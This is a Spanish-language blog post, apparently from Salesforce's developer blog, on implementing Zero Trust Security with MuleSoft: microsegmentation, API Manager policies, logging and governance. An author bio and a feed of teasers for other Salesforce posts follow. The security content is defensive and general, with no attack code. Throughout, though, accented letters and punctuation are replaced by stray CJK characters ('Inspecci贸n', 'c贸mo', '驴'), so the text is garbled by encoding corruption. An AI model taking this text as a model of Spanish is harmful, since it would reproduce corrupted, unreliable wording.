  • Inspecci贸n completa y visibilidad del flujo de datos : debemos asegurarnos de que haya transparencia en el flujo de datos. Debemos tener cuidado con el registro de la carga 煤til, ya que podr铆a involucrar informaci贸n confidencial. Si hay m煤ltiples sistemas finales y API involucrados, deber铆amos tener una visi贸n general de 360 grados de la arquitectura del sistema y el flujo de datos. De esta forma, podemos controlar el mal uso de informaci贸n sensible y la fuga de informaci贸n.
  • Gesti贸n de control centralizado: Para implementar fuertes medidas de seguridad, necesitamos un centro de gesti贸n centralizado. Esto nos permitir谩 aplicar medidas de seguridad en todas las entidades. Tambi茅n nos da un control completo sobre la infraestructura de la organizaci贸n desde una perspectiva de seguridad. API Manager es un lugar para dejar de administrar aplicaciones API, Mule y Non-MuleSoft. Puede administrar, proteger y gobernar aplicaciones con la ayuda de API Manager.

Implementaci贸n de seguridad de confianza cero

Es muy probable que su infraestructura existente ya tenga algunas medidas de seguridad implementadas. Para implementar ZTS, no tiene que comenzar a construir todo desde cero o reconstruir su infraestructura de seguridad existente. Todo lo que necesita hacer es planificar bien las medidas de seguridad e identificar las lagunas. Puede lograr esto adoptando un enfoque de microsegmentaci贸n o seguridad en capas.

Microsegmentaci贸n o enfoque de seguridad en capas

Esta es una t茅cnica en la que dividimos la infraestructura en niveles o segmentos y luego aplicamos medidas de seguridad. Tambi茅n podemos considerarlo como "divide y vencer谩s", donde estamos dividiendo la gran infraestructura en fragmentos m谩s peque帽os para una mejor seguridad y control. Este enfoque nos brinda seguridad a nivel granular.

Podemos implementar los principios b谩sicos de ZTS de la siguiente manera:

  1. Enumere todos los activos, sistemas finales, aplicaciones, datos y puntos finales de API. Comprobar el estado del dispositivo y del sistema. Implemente la autenticaci贸n de extremo a extremo y no permita el acceso lateral.
  2. Resuma el flujo de datos y las conexiones. Dise帽e su infraestructura actual.
  3. En funci贸n de la criticidad de la informaci贸n, identificar las pol铆ticas de seguridad a aplicar en cada punto de entrada. Implemente el acceso basado en roles y pol铆ticas.
  4. Haga cumplir la implementaci贸n de seguridad a trav茅s de un sistema de gesti贸n central y supervise su infraestructura.

ZTS con MuleSoft

Es posible que ya est茅 familiarizado con las capacidades de integraci贸n de MuleSoft y c贸mo aprovechar la conectividad dirigida por API para construir una infraestructura componible. Lo siguiente lo ayudar谩 a comprender c贸mo implementar ZTS usando las capacidades de seguridad de MuleSoft.

Tomemos en consideraci贸n una arquitectura componible creada con conectividad dirigida por API (vea la imagen a continuaci贸n). La l铆nea exterior punteada en rojo denota seguridad basada en el per铆metro, ya que estamos aplicando seguridad en un nivel perif茅rico. Para aplicar ZTS, aplicaremos medidas de seguridad en cada capa de la API y en todo el punto final de la API. Las l铆neas internas de puntos rojos en la capa de proceso indican que hemos aplicado una pol铆tica de eliminaci贸n de encabezado y autenticaci贸n b谩sica en el punto de entrada de la capa de experiencia a la capa de proceso.


驴C贸mo logramos ZTS con MuleSoft?

  1. Aplicaci贸n de pol铆ticas de seguridad listas para usar: MuleSoft ofrece varias pol铆ticas de seguridad listas para usar, desde la autenticaci贸n b谩sica hasta OAuth y JWT. Podemos aplicar f谩cilmente estas pol铆ticas en nuestro nivel de puerta de enlace API utilizando Anypoint API Manager . Tambi茅n podemos personalizar estas pol铆ticas para cumplir con los est谩ndares y regulaciones de nuestra organizaci贸n.
  2. Creaci贸n de entornos seguros: podemos aplicar la protecci贸n contra amenazas en cada per铆metro perimetral de forma autom谩tica mediante Anypoint Security en una plataforma que cumpla con las normas ISO 27001, SOC 1 y 2, HIPAA, PCI DSS y GDPR.
  3. Registro y monitoreo efectivos: podemos lograr transparencia utilizando las capacidades de registro y monitoreo de MuleSoft, y usar API Catalog CLI para descubrir y catalogar nuestras API.
  4. Gobernanza continua : utilizamos Anypoint API Governance para identificar, validar y hacer cumplir las mejores pr谩cticas de seguridad para las API, como OWASP Top 10, desde el dise帽o hasta la implementaci贸n.

Conclusi贸n


En este blog, hemos aprendido sobre Zero Trust Security y sus principios b谩sicos. Tambi茅n somos conscientes de la diferencia entre la seguridad basada en el per铆metro y ZTS, y por qu茅 ZTS es importante. Adem谩s, hemos aprendido c贸mo podemos implementar ZTS usando MuleSoft y las capacidades de seguridad que MuleSoft tiene para ofrecer.

Recursos

Sobre el Autor

Akshata Sawant es promotora s茅nior de desarrolladores en Salesforce. Es autora, bloguera y oradora, y coautora del t铆tulo, MuleSoft for Salesforce Developers . Akshata es un miembro activo de la comunidad de MuleSoft y ex embajador de MuleSoft. Le encanta leer, bailar, viajar y la fotograf铆a, y es una gran entusiasta de la comida. S铆guela en Twitter y LinkedIn.

Obtenga las 煤ltimas publicaciones de blog de desarrolladores de Salesforce y episodios de podcast a trav茅s de Slack o RSS.

Agregar a Slack Suscr铆bete a RSS

Continue reading

Prepare su aplicaci贸n para pasar la revisi贸n de seguridad de AppExchange 鈽侊笍

Prepare su aplicaci贸n para pasar la revisi贸n de seguridad de AppExchange 鈽侊笍

Esta gu铆a se public贸 originalmente en Medium en 2021 y se actualiz贸 con la orientaci贸n y los consejos m谩s recientes, incluidas las nuevas funciones de seguridad como parte de los lanzamientos recientes y la nueva estructura de precios para las revisiones.

La publicaci贸n Prepare su aplicaci贸n para pasar la revisi贸n de seguridad de AppExchange apareci贸 primero en el blog de desarrolladores de Salesforce .

Continue reading

Ahora en Pilot: adaptador de cable GraphQL para LWC 鈽侊笍

El adaptador de cable GraphQL est谩 en fase piloto a partir de la versi贸n Spring '23. Descubra c贸mo hace que acceder a los datos de los LWC sea m谩s f谩cil que nunca.

La publicaci贸n Now in Pilot: GraphQL Wire Adapter for LWC apareci贸 primero en el blog de desarrolladores de Salesforce .

Continue reading

Automation Studio y SQL en Marketing Cloud 鈽侊笍

Este blog lo ayuda a comprender los casos de uso de las actividades de Automation Studio y SQL Query en Marketing Cloud y brinda orientaci贸n sobre las mejores pr谩cticas.

La publicaci贸n Automation Studio y SQL en Marketing Cloud apareci贸 primero en el blog de desarrolladores de Salesforce .

Continue reading

Implemente la gamificaci贸n en su Salesforce

脷ltima actualizaci贸n el 22 de noviembre de 2022 por Rakesh GuptaGran idea o pregunta duradera: 驴C贸mo puedo usar la gamificaci贸n en Salesforce para impulsar las ventas? 驴Cu谩les son las formas de automatizar la gamificaci贸n? Objetivos: despu茅s de leer esta publicaci贸n de blog, el lector podr谩: Crear un flujo que publicar谩 autom谩ticamente un

La publicaci贸n Implemente la gamificaci贸n en su fuerza de ventas apareci贸 primero en Automation Champion .

Continue reading

C贸mo aprobar el examen de certificaci贸n de administrador avanzado de Salesforce

脷ltima actualizaci贸n el 27 de septiembre de 2022 por Rakesh Gupta Han pasado nueve a帽os desde que aprob茅 el examen de administrador avanzado de Salesforce. En las 煤ltimas semanas, muchas personas se comunicaron conmigo para pedirme orientaci贸n y un camino para convertirme en un administrador avanzado certificado. Eso me da una idea

La publicaci贸n C贸mo aprobar el examen de certificaci贸n de administrador avanzado de Salesforce apareci贸 primero en Automation Champion .

Continue reading

Una introducci贸n a Apex para desarrolladores de Java 鈽侊笍

Si es un desarrollador de Java que explora el ecosistema de Salesforce y se pregunta qu茅 es Apex, 隆esta publicaci贸n es para usted! Apex es el lenguaje de programaci贸n backend de la plataforma Salesforce. Apex, junto con herramientas declarativas como Flows, le permite personalizar la l贸gica empresarial. Apex se basa en la sintaxis de Java optimizada espec铆ficamente para los requisitos de [鈥

La publicaci贸n Una introducci贸n a Apex para desarrolladores de Java apareci贸 primero en el blog de desarrolladores de Salesforce .

Continue reading

C贸mo aprobar el examen de certificaci贸n de asociado certificado de Salesforce

脷ltima actualizaci贸n el 13 de septiembre de 2022 por Rakesh Gupta Como asociado certificado de Salesforce reci茅n nombrado, estoy compartiendo mis experiencias de estudio con usted y quiero que sea el pr贸ximo en hacerlo. 隆As铆 que prep谩rate y sum茅rgete! 馃憠 Ya que est谩s aqu铆, es posible que desees

La publicaci贸n C贸mo aprobar el examen de certificaci贸n de asociado certificado de Salesforce apareci贸 primero en Automation Champion .

Continue reading

C贸mo aprobar el examen de certificaci贸n de dise帽ador de estrategias de Salesforce

脷ltima actualizaci贸n el 16 de julio de 2022 por Rakesh Gupta El dise帽o de la estrategia juega un papel crucial en la forma en que una empresa logra sus objetivos. El dise帽o de estrategias lo ayuda a transformar su visi贸n y objetivos estrat茅gicos en fases de implementaci贸n factibles a trav茅s de m茅todos de pensamiento de dise帽o. Cualquier estrategia de dise帽o debe abordar lo siguiente: Problemas existentes

La publicaci贸n C贸mo aprobar el examen de certificaci贸n de dise帽ador de estrategias de Salesforce apareci贸 primero en Automation Champion .

Continue reading

C贸mo aprobar el examen de certificaci贸n de analista comercial de Salesforce

Actualizado por 煤ltima vez el 13 de julio de 2022 por Rakesh Gupta Hoy, me present茅 para el examen de certificaci贸n de analista comercial certificado de Salesforce y, 隆bien, lo aprob茅! Y, oh s铆, logr茅 pasarlo en mi primer intento. Entonces, 隆sigue adelante en el 'Camino de ladrillos amarillos'! 驴Qu茅 hace un analista de negocios?

La publicaci贸n C贸mo aprobar el examen de certificaci贸n de analista comercial de Salesforce apareci贸 primero en Automation Champion .

Continue reading

Eliminar duplicados de variables de recopilaci贸n de registros en un flujo

脷ltima actualizaci贸n el 7 de junio de 2022 por Rakesh Gupta Gran idea o pregunta duradera: 驴C贸mo se eliminan los duplicados de las variables de colecci贸n de registros o las variables de colecci贸n en flujo sin escribir c贸digo? Objetivos: despu茅s de leer este blog, podr谩: Comprender los diferentes operadores de flujo en el elemento de asignaci贸n Comprender

La publicaci贸n Eliminar duplicados de las variables de recopilaci贸n de registros en un flujo apareci贸 primero en Automation Champion .

Continue reading

Pr谩cticas recomendadas de pruebas inteligentes de Salesforce con Panaya Foresight

脷ltima actualizaci贸n el 31 de mayo de 2022 por Rakesh Gupta Una de las mejores partes de Salesforce son sus caracter铆sticas listas para usar que se pueden adaptar f谩cilmente para satisfacer las necesidades espec铆ficas de su negocio. Pero si bien puede ser f谩cil actualizar un nuevo proceso de ventas o crear una capa personalizada

La publicaci贸n Mejores pr谩cticas de pruebas inteligentes de Salesforce con Panaya Foresight apareci贸 primero en Automation Champion .

Revisi贸n de la aplicaci贸n

Continue reading

Presentamos la API de la plataforma Einstein Bots 鈽侊笍

La API de la plataforma Einstein Bots es una nueva API REST que le permite interactuar con sus Bots de Einstein desde cualquier cliente. En esta publicaci贸n de blog, exploraremos c贸mo usar esta nueva API para hablar con su bot, y en publicaciones posteriores de esta serie, analizaremos casos espec铆ficos en detalle. Qu茅 son [鈥

La publicaci贸n Introducci贸n a la API de la plataforma Einstein Bots apareci贸 primero en el blog de desarrolladores de Salesforce .

Continue reading

Env铆e un mensaje directo de Slack usando Flow

Gran idea o pregunta duradera: 驴C贸mo se env铆a un mensaje directo al propietario de la cuenta en Slack a trav茅s de Salesforce Flow? Slack es una aplicaci贸n de mensajer铆a para empresas que conecta a las personas con la informaci贸n que necesitan. Sus espacios de trabajo le permiten organizar las comunicaciones por canales para discusiones grupales y le permiten

La publicaci贸n Enviar un mensaje directo de Slack mediante Flow apareci贸 por primera vez en Automation Champion .

Continue reading

Publicar un mensaje en un canal de Slack mediante Flow

脷ltima actualizaci贸n el 24 de mayo de 2022 por Rakesh GuptaGran idea o pregunta duradera: 驴C贸mo se publica un mensaje en un canal de Slack a trav茅s de Salesforce Flow? Slack es una aplicaci贸n de mensajer铆a para empresas que conecta a las personas con la informaci贸n que necesitan. Sus espacios de trabajo te permiten organizar las comunicaciones por canales

La publicaci贸n Publicar un mensaje en un canal de Slack usando Flow apareci贸 primero en Automation Champion .

Continue reading

Crear casos autom谩ticamente a partir de preguntas de Chatter no resueltas

脷ltima actualizaci贸n el 5 de abril de 2022 por Rakesh Gupta Gran idea o pregunta duradera: a medida que crece su comunidad, las organizaciones deben asegurarse de que los clientes obtengan respuestas r谩pidas a sus preguntas. Pregunta a caso permite a los moderadores derivar preguntas de Chatter no resueltas a casos desde la p谩gina de Chatter. Puede automatizar este proceso de escalamiento

La publicaci贸n Crear casos autom谩ticamente a partir de preguntas de Chatter no resueltas apareci贸 primero en Automation Champion .

Continue reading

Preg煤ntame cualquier cosa con los desarrolladores de Salesforce: integraci贸n continua 鈽侊笍

El 煤ltimo mi茅rcoles de cada mes, Salesforce Developers organiza una sesi贸n de "Ask Me Anything" (AMA) en nuestro canal de YouTube. Nos sumergimos profundamente en un tema mensual y respondemos preguntas en vivo publicadas en Twitter, nuestro grupo de la comunidad de desarrolladores y el chat en vivo de YouTube, adem谩s de compartir recursos relacionados con el tema. El mes pasado, las estrellas se alinearon cuando [鈥

La publicaci贸n Ask Me Anything with Salesforce Developers: Continuous Integration apareci贸 por primera vez en el Blog de desarrolladores de Salesforce.

Continue reading